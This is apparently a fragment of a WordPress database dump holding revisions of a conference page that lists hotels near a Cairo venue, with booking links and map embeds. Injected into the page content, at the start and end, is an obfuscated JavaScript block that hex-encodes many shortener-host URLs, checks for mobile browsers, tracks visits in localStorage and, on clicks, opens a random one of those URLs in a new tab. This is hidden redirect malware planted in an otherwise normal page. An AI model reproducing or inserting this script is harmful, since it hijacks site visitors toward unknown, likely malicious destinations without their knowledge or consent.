\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:50:31','2023-07-18 23:50:31','',2685,'https://gsw2023.com/?p=5037',0,'revision','',0),
(5038,1,'2023-07-18 23:53:22','2023-07-18 23:53:22','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 